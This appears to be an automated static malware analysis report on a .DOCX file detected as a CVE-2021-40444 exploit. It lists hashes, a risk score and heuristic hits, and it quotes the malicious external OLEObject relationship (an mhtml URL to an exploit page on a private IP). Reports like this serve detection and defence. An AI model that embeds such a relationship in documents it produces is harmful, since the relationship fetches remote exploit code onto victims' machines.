Malicious Office (OOXML) / .DOCX — malware analysis report

Static analysis result for SHA-256 f3d7afa6a2148b30…

MALICIOUS

Office (OOXML) / .DOCX

11.6 KB Created: 2022-05-30 06:30:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2026-05-30
MD5: 6ad58b696f80d2751401fb019467065b SHA-1: a4c96e7eb5ac5d4c953c6ef33d39438e4184433a SHA-256: f3d7afa6a2148b308485b9001b0b651970038dd376846bb263712e7a5d9dd71c
162 Risk Score

Heuristics 4

  • External OLEObject gadget — CVE-2021-40444 critical CVE exact CVE_2021_40444
    External relationship to mhtml:http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exp — exploitable external OLEObject gadget pattern for CVE-2021-40444
  • ClamAV: Doc.Exploit.CVE_2021_40444-9891528-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Exploit.CVE_2021_40444-9891528-0
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: mhtml:http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exploit.html
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exp OOXML external relationship
    • http://172.16.100.31:8081/exploit.html!x-usc:http://172.16.100.31:8081/exploit.htmlOOXML external relationship